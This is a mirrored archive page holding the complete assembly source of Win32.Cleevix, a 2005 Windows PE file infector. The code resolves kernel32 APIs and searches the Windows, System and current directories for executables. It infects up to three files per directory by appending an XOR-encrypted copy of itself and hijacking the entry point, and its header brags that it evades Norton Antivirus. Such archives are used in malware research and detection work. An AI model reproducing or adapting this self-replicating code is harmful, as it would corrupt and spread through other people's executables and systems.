13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
vxug-MalwareSourceCode/Win32/Win32.Cleevix.asm
2020-10-10 22:07:43 -05:00

718 lines
20 KiB
NASM

;-------------------------------------------------------------------------------
;Win32.Cleevix (c)opyright 2005 by lclee_vx
;
;Win32.Cleevix is a PE infector on Windows 9x/2K/XP with simple encryption, anyhow,
;its not detect by Norton Antivirus. :)!!
;
;
;
;Description
;-----------
;When a file infected by Win32.Cleevix is executed, the virus start the process
;as below:
;
;1) Retrieve the base address of Kernel32.dll
;2) Scans the Export Table of Kernel32.dll for the API Functions
;3) Retrieve API functions by scanning others *.dll file. For example, retrieve
; MessageBox function from User32.dll file.
;4) Scan the Current, Windows and System directory, infect all the *exe files.
; Infected files will grow by about 2.99 Kilobyte
;5) The virus do not try to harm/damage the system, its just patch itself to the
; PE files. Anyhow, it might bring down the system as the scanning process running.
;6) The virus apply the simple encryption, its not detected by Norton Antivirus (tested)
;
;
;That is about all folks. The code is heavily commented, so, it should be easy
;enough to follow.
;
; Disclaimer
; ----------
;THIS CODE IS MEANT FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR CANNOT BE HELD
;RESPONSIBLE FOR ANY DAMAGE CAUSED DUE TO USE, MISUSE OR INABILITY TO USE THE
;SAME
;
;
;Author : lclee_vx
;Group : F-13 Labs
;Web : http://f13.host.sk
;Email : lclee_vx@yahoo.com
;----------------------------------------------------------------------------------
.386p
.model flat, stdcall
option casemap:none
jumps
.data
;------------------------------------------------------------------------------
;Start The Code
;------------------------------------------------------------------------------
.code
VirusStart:
call delta
delta:
pop ebp
mov eax, ebp
sub ebp, offset delta
sub eax, RedundantSize
sub eax, 1000h
NewEip equ $-4
mov dword ptr [ebp+AppBase], eax
mov esi, [esp]
and esi, 0FFFF0000h
pushad
call Crypt
popad
CryptStart:
call GetK32
mov dword ptr [ebp+offset aKernel32], eax ;save kernel32.dll
;-------------------------------------------------------------------------------
;here we looking for APIs function
;-------------------------------------------------------------------------------
lea edi, [ebp+offset @@Offsetz]
lea esi, [ebp+offset @@Namez]
call GetApis
call SpecialApi
call DirScan
CryptEnd:
cmp ebp, 0
je FirstGeneration
ReturnHost:
mov eax, 12345678h
org $-4
OldEip dd 00001000h
mov eax, dword ptr [ebp+offset OldEip]
jmp eax
ret
;-------------------------------------------------------------------------------
;1) Changing to Windows directory, System directory and current directory
;2) remember size buffer have to set > Max_Path (260)
;-------------------------------------------------------------------------------
DirScan:
push 128h ;have to set Buffer size > 260
lea eax, [ebp+offset WindowsDir] ;retrieve the path of Windows
;Directory
push eax
mov eax, dword ptr [ebp+offset aGetWindowsDirectoryA]
call eax
push 128h ;buffer size > 260
lea eax, [ebp+offset SystemDir] ;retrieve the path of System
push eax ;directory
mov eax, [ebp+offset aGetSystemDirectoryA]
call eax
lea eax, [ebp+offset CurrentDir] ;retrieve the path of Current
push eax ;directory
push 128h ;buffer size > 260
mov eax, [ebp+offset aGetCurrentDirectoryA]
call eax
lea eax, [ebp+offset WindowsDir]
push eax
mov eax, [ebp+offset aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles ;start searching the target files
lea eax, [ebp+offset SystemDir]
push eax
mov eax, [ebp+offset aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles
lea eax, [ebp+offset CurrentDir]
push eax
mov eax, [ebp+offset aSetCurrentDirectoryA]
call eax
mov dword ptr [ebp+offset Counter], 3
call SearchFiles
ret
;-------------------------------------------------------------------------------
;1) Search the target files (*.exe)
;2) Trying Infect 3 files
;-------------------------------------------------------------------------------
SearchFiles:
push ebp ;save ebp
lea eax, dword ptr [ebp+offset Win32FindData] ;load the Win32_Find_Data structure
push eax
lea eax, [ebp+offset Mark] ;search *.exe
push eax
mov eax, [ebp+offset aFindFirstFileA] ;start searching
call eax
pop ebp
inc eax ;check with eax=FFFFFFFF+1
jz SearchClose ;fail :(
dec eax ;get the original FileHandle
mov dword ptr [ebp+offset SearchHandle], eax ;save FileHandle
mov esi, offset Win32FindData.FileName ;esi=pointer to FileName
add esi, ebp
mov dword ptr [ebp+offset FilePointer], esi ;save the Pointer to FileName
cmp [Win32FindData.FileSizeHigh+ebp], 0 ;high 32 bits of FileSize
jne SearchNext ;way too big for us
mov ecx, [Win32FindData.FileSizeLow+ebp] ;ecx=File Size
mov dword ptr [ebp+offset NewFileSize], ecx ;NewFileSize will change in InfectFiles
mov dword ptr [ebp+offset OriFileSize], ecx ;routine
push dword ptr [ebp+offset OldEip]
call InfectFiles
pop dword ptr [ebp+offset OldEip]
dec dword ptr [ebp+offset Counter] ;Counter - 1
cmp dword ptr [ebp+offset Counter], 0
je SearchHandleClose
SearchNext:
push ebp
mov eax, dword ptr [ebp+offset Win32FindData]
push eax
mov eax, dword ptr [ebp+offset SearchHandle] ;eax=Search Handle
push eax
mov eax, [ebp+offset aFindNextFileA]
call eax
pop ebp
cmp eax, 0 ;error?
je SearchHandleClose ;done
mov esi, offset Win32FindData.FileName
add esi, ebp
mov dword ptr [ebp+offset FilePointer], esi ;esi=File Pointer
cmp [Win32FindData.FileSizeHigh+ebp], 0
jne SearchNext
mov ecx, [Win32FindData.FileSizeLow+ebp] ;ecx=File Size
mov dword ptr [ebp+offset NewFileSize], ecx ;save it
mov dword ptr [ebp+offset OriFileSize], ecx
push dword ptr [ebp+offset OldEip]
call InfectFiles
pop dword ptr [ebp+offset OldEip]
dec dword ptr [ebp+offset Counter] ;Counter - 1
cmp dword ptr [ebp+offset Counter], 0
jne SearchNext
SearchHandleClose:
push dword ptr [ebp+offset SearchHandle]
mov eax, [ebp+offset aFindClose]
call eax
cmp eax, 0
je SearchClose
SearchClose:
ret
;----------------------------------------------------------------------------------
;Here start to set the file attributes, mapping files and infect the files
;(1) save the original FileSize, FileAttribute
;(2) Open the file with API CreateFileA. if error,
;----------------------------------------------------------------------------------
InfectFiles:
pushad ;save all the register before
;start infect
mov dword ptr [ebp+offset InfectFlag], 0
mov ecx, dword ptr [ebp+offset NewFileSize]
cmp ecx, MinimumFileSize ;minimum FileSize=400h
jb JumpOut
add ecx, total_size
mov dword ptr [ebp+offset NewFileSize], ecx
push ebp
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aGetFileAttributesA]
call eax
pop ebp
mov dword ptr [ebp+offset FileAttribute], eax ;save the original file attribute
push ebp
push 00000080h ;set file attribute = any
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aSetFileAttributesA]
call eax
pop ebp
cmp eax, 0 ;error?
jz ErrorOpenExe
push ebp
push 0h
push 00000080h
push 00000003h
push 0h
push 00000001h
push 80000000h or 40000000h
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aCreateFileA]
call eax
pop ebp
inc eax ;if error, eax=0FFFFFFFFh. eax = eax+1
cmp eax, 0 ;error?
jz ErrorOpenExe
dec eax
mov dword ptr [ebp+offset FileHandle], eax ;save the FileHandle
push ebp
push dword ptr [ebp+offset NewFileSize]
push 0h
mov eax, [ebp+offset aGlobalAlloc]
call eax
pop ebp
cmp eax, 0h
jz ErrorBuffer ;error?
mov dword ptr [ebp+offset MemoryHandle], eax ;save
push ebp
lea eax, [ebp+offset ByteRead]
push 0h
push eax
push dword ptr [ebp+offset OriFileSize]
push dword ptr [ebp+offset MemoryHandle]
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aReadFile]
call eax
pop ebp
cmp eax, 0h ;error?
jz ErrorReadExe
push ebp
push 0h
push 0h
push 0h
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aSetFilePointer]
call eax
pop ebp
inc eax ;if fail, eax=0FFFFFFFFh. eax = eax+1
cmp eax, 0h
jz ErrorReadExe
mov ebx, dword ptr [ebp+offset MemoryHandle]
mov esi, dword ptr [ebp+offset MemoryHandle]
cmp word ptr [esi], "ZM"
jnz ErrorReadExe
xor eax, eax ;eax = 0
mov eax, dword ptr [esi+3ch] ;eax = offset PE Header
add esi, eax ;esi = point to PE Header
cmp dword ptr [esi], "EP" ;PE file ?
jz StartInfect
mov dword ptr [ebp+offset InfectFlag], 0FFh
jmp ErrorReadExe
StartInfect:
mov dword ptr [ebp+offset PEHeader], esi
cmp dword ptr [esi+4ch], "31" ;infected?
jz InfectError
mov dword ptr [esi+4ch], "31" ;put the infected symbol
mov ebx, [esi+74h] ;ebx=NumberOfRvaAndSizes
shl ebx, 3 ;ebx=ebx*8
xor eax, eax ;eax=0
mov ax, word ptr [esi+06h] ;ax = Number of Sections
dec eax ;eax=eax-1
mov ecx, 28h
mul ecx ;eax=eax*ecx
add eax, ebx
add esi, 78h
add esi, eax ;now esi point to Last Section
mov edi, dword ptr [ebp+offset PEHeader] ;edi=PE Header
mov eax, [esi+0ch] ;eax= VirtualAddress
add eax, dword ptr [esi+10h] ;eax = VirtualAddress+SizeOfRawData
mov dword ptr [ebp+offset NewEip], eax
xchg eax, [edi+28h] ;eax = Original AddressOfEntryPoint
add eax, [edi+34h] ;eax= Original AddressOfEntryPoint+ImageBase
mov dword ptr [ebp+offset OldEip], eax ;save as OldEip
mov ecx, total_size
add [esi+08h], ecx ;New VirtualSize= Original VirtualSize+VirusSize
mov eax, [esi+08h] ;eax = New VirtualSize
add eax, [esi+0ch] ;eax = New VirtualSize+VirtualAddress
mov [edi+50h], eax ;eax=SizeOfImage
mov eax, [esi+10h] ;eax=SizeOfRawData
add [esi+10h], ecx ;New SizeOfRawData= Old SizeOfRawData+VirusSize
or dword ptr [esi+24h], 0A0000020h
mov edi, [esi+14h]
mov ebx, dword ptr [ebp+offset MemoryHandle]
add edi, ebx
add edi, eax
mov esi, offset VirusStart
add esi, ebp
pushad
mov byte ptr [ebp+offset CryptKey], 0ffh
call Crypt
popad
rep movsb
call Crypt
lea eax, [ebp+offset ByteRead]
push ebp
push 0h
push eax
push dword ptr [ebp+offset NewFileSize]
push dword ptr [ebp+offset MemoryHandle]
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aWriteFile]
call eax
pop ebp
InfectError:
ErrorReadExe:
push ebp
push dword ptr [ebp+offset MemoryHandle]
mov eax, [ebp+offset aGlobalFree]
call eax
pop ebp
ErrorBuffer:
push ebp
push dword ptr [ebp+offset FileHandle]
mov eax, [ebp+offset aCloseHandle]
call eax
pop ebp
ErrorOpenExe:
push ebp
push dword ptr [ebp+offset FileAttribute]
push dword ptr [ebp+offset FilePointer]
mov eax, [ebp+offset aSetFileAttributesA]
call eax
pop ebp
jmp InfectCheck
InfectFail:
stc
jmp JumpOut
InfectCheck:
cmp dword ptr [ebp+offset InfectFlag], 0FFh
jz InfectFail
clc
JumpOut:
popad
ret
;----------------------------------------------------------------------------------
;Searching Kernel32.dll address
;----------------------------------------------------------------------------------
GetK32 PROC
ScanK32:
cmp word ptr [esi], "ZM"
je K32Found
sub esi, 1000h
jmp ScanK32
K32Found:
mov eax, esi
ret
GetK32 endp
;------------------------------------------------------------------------------------
;Searching The APIs function
;edi=API offset
;esi=API name
;------------------------------------------------------------------------------------
GetApis PROC
@@1:
mov eax, dword ptr [ebp+aKernel32]
push esi
push edi
call GetApi
pop edi
pop esi
mov [edi], eax ;store API address in eax ----> edi
add edi, 4
@@3:
inc esi
cmp byte ptr [esi], 0
jne @@3
inc esi
cmp byte ptr [esi], 0FFh ;ended?
jnz @@1
ret
GetApis endp
GetApi PROC
mov ebx, [eax+3ch] ;ebx=offset PE header
add ebx, eax ;ebx=point to PE header
mov ebx, [ebx+78h] ;ebx=point to ExportDirectory Virtual Address
add ebx, eax ;normalize, ebx=point to ExportDirectory
xor edx, edx ;edx=0
mov ecx, [ebx+20h] ;ecx=point to AddressOfNames
add ecx, eax ;normalize
push esi ;save to stack
push edx ;save to stack
NextApi:
pop edx
pop esi
inc edx ;edx=the index into AddressOfOrdinals+1
mov edi, [ecx] ;edi=API function export by Kernel32.dll
add edi, eax ;normalize
add ecx, 4 ;point to next API function
push esi ;save to stack
push edx
CompareApi:
mov dl, [edi] ;dl=API function export by Kernel32.dll
mov dh, [esi] ;dh=API function we looking for
cmp dl, dh ;match?
jne NextApi ;not match....ok...next API
inc edi ;if match, compare next byte
inc esi
cmp byte ptr [esi], 0 ;finish?
je GetAddr ;jmp to get the address of API function
jmp CompareApi
GetAddr:
pop edx
pop esi
dec edx ;edx-1 (because edx=index point to zero -finish)
shl edx, 1 ;edx=edx*2
mov ecx, [ebx+24h]
add ecx, eax
add ecx, edx ;ecx=ordinals
xor edx,edx
mov dx, [ecx]
shl edx, 2 ;edx=edx*4
mov ecx, [ebx+1ch] ;ecx=RVA AddressOfFunctions
add ecx, eax ;normalize
add ecx, edx
add eax, [ecx] ;eax=address of API function we looking for
ret
GetApi endp
;-----------------------------------------------------------------------------
;call special API MessageBoxA
;-----------------------------------------------------------------------------
SpecialApi proc
push offset User32Dll
mov eax, dword ptr [ebp+offset aLoadLibraryA]
call eax
mov esi, offset sMessageBoxA
push esi
push eax
mov eax, dword ptr [ebp+offset aGetProcAddress]
call eax
mov dword ptr [ebp+offset aMessageBoxA], eax
ret
SpecialApi endp
;------------------------------------------------------------------------------
;Encrypt/Decrypt Virus Data
;------------------------------------------------------------------------------
Crypt:
mov esi, offset CryptStart
add esi, ebp
mov ah, byte ptr [ebp+offset CryptKey]
mov ecx, CryptEnd-CryptStart
CryptLoop:
xor byte ptr [esi], ah
inc esi
loop CryptLoop
ret
;-------------------------------------------------------------------------------
;Pop up message
;-------------------------------------------------------------------------------
FirstGeneration:
push 0
push offset szTopic
push offset szText
push 0
mov eax, dword ptr [ebp+offset aMessageBoxA]
call eax
push 0
mov eax, dword ptr [ebp+offset aExitProcess]
call eax
;-----------------------------------------------------------------------------
;APIs function needed.
;-----------------------------------------------------------------------------
sMessageBoxA db "MessageBoxA", 0
aMessageBoxA dd 00000000h
@@Namez label byte
sGetProcAddress db "GetProcAddress", 0
sLoadLibraryA db "LoadLibraryA", 0
sExitProcess db "ExitProcess", 0
sGetWindowsDirectoryA db "GetWindowsDirectoryA", 0
sGetSystemDirectoryA db "GetSystemDirectoryA", 0
sGetCurrentDirectoryA db "GetCurrentDirectoryA", 0
sSetCurrentDirectoryA db "SetCurrentDirectoryA", 0
sFindFirstFileA db "FindFirstFileA", 0
sFindNextFileA db "FindNextFileA", 0
sFindClose db "FindClose", 0
sGlobalAlloc db "GlobalAlloc", 0
sGlobalFree db "GlobalFree", 0
sGetFileAttributesA db "GetFileAttributesA", 0
sSetFileAttributesA db "SetFileAttributesA", 0
sCreatFileA db "CreateFileA", 0
sReadFile db "ReadFile", 0
sWriteFile db "WriteFile", 0
sGetFileTime db "GetFileTime",0
sGetFileSize db "GetFileSize", 0
sCreateFileMapping db "CreateFileMapping", 0
sMapViewOfFile db "MapViewOfFile", 0
sUnmapViewOfFile db "UnmapViewOfFile", 0
sCloseHandle db "CloseHandle", 0
sSetFileTime db "SetFileTime", 0
sSetFilePointer db "SetFilePointer", 0
sSetEndOfFile db "SetEndOfFile", 0
db 0FFh
@@Offsetz label byte
aGetProcAddress dd 00000000h
aLoadLibraryA dd 00000000h
aExitProcess dd 00000000h
aGetWindowsDirectoryA dd 00000000h
aGetSystemDirectoryA dd 00000000h
aGetCurrentDirectoryA dd 00000000h
aSetCurrentDirectoryA dd 00000000h
aFindFirstFileA dd 00000000h
aFindNextFileA dd 00000000h
aFindClose dd 00000000h
aGlobalAlloc dd 00000000h
aGlobalFree dd 00000000h
aGetFileAttributesA dd 00000000h
aSetFileAttributesA dd 00000000h
aCreateFileA dd 00000000h
aReadFile dd 00000000h
aWriteFile dd 00000000h
aGetFileTime dd 00000000h
aGetFileSize dd 00000000h
aCreateFileMapping dd 00000000h
aMapViewOfFile dd 00000000h
aUnmapViewOfFile dd 00000000h
aCloseHandle dd 00000000h
aSetFileTime dd 00000000h
aSetFilePointer dd 00000000h
aSetEndOfFile dd 00000000h
;------------------------------------------------------------------------------
;Parameters
;------------------------------------------------------------------------------
aKernel32 dd 00000000h
Counter dd 00000000h
SearchHandle dd 00000000h
FileHandle dd 00000000h
FilePointer dd 00000000h
OriginalFileTime dd 00000000h
MapSize dd 00000000h
FileAttribute dd 00000000h
MemoryHandle dd 00000000h
MapAddress dd 00000000h
OldRawSize dd 00000000h
NewRawSize dd 00000000h
NewFileSize dd 00000000h
PEHeader dd 00000000h
FileAlign dd 00000000h
IncreaseRaw dd 00000000h
InfectFlag dd 00000000h
OriFileSize dd 00000000h
AppBase dd 00400000h
ByteRead dd ?
User32Dll db "User32.dll", 0 ;User32.dll
WindowsDir db 128h dup (0)
SystemDir db 128h dup (0)
Mark db "*.exe", 0 ;target file *.exe
RedundantSize equ (offset delta - offset VirusStart)
total_size equ (offset VirusEnd - offset VirusStart)
szTopic db "F-13 Labs", 0
szText db "Author:lclee_vx", 0
max_path equ 260
MinimumFileSize equ 1024d
filetime STRUC ;file time structure
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
filetime ENDS
win32_find_data STRUC
FileAttributes DD ? ; attributes
CreationTime filetime ? ; time of creation
LastAccessTime filetime ? ; last access time
LastWriteTime filetime ? ; last modificationm
FileSizeHigh DD ? ; filesize
FileSizeLow DD ? ; -"-
Reserved0 DD ? ;
Reserved1 DD ? ;
FileName DB max_path DUP (?) ; long filename
AlternateFileName DB 13 DUP (?) ; short filename
DB 3 DUP (?) ; dword padding
win32_find_data ENDS ;
;
Win32FindData win32_find_data ? ; our search area
CryptKey db ?
VirusEnd:
ends
end VirusStart